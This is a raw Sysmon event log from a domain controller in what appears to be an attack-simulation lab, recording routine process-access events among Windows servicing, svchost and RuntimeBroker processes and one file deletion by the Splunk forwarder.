10341000x80000000000000006051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.807{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.792{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.792{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.792{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.745{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.729{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.714{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.698{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.683{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.683{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B71E71E0EE68229607E5B7756414B049,SHA256=B7FA68525D27A5C7BB62C19804F7EB60CB67DB32C9461EF33D5E8884D9A6B2D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.667{266CAFBE-64C4-6064-9B00-00000000AE01}49243480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.667{266CAFBE-64C4-6064-9B00-00000000AE01}49243480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.667{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.667{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.652{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.652{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.652{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.652{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.652{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.652{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
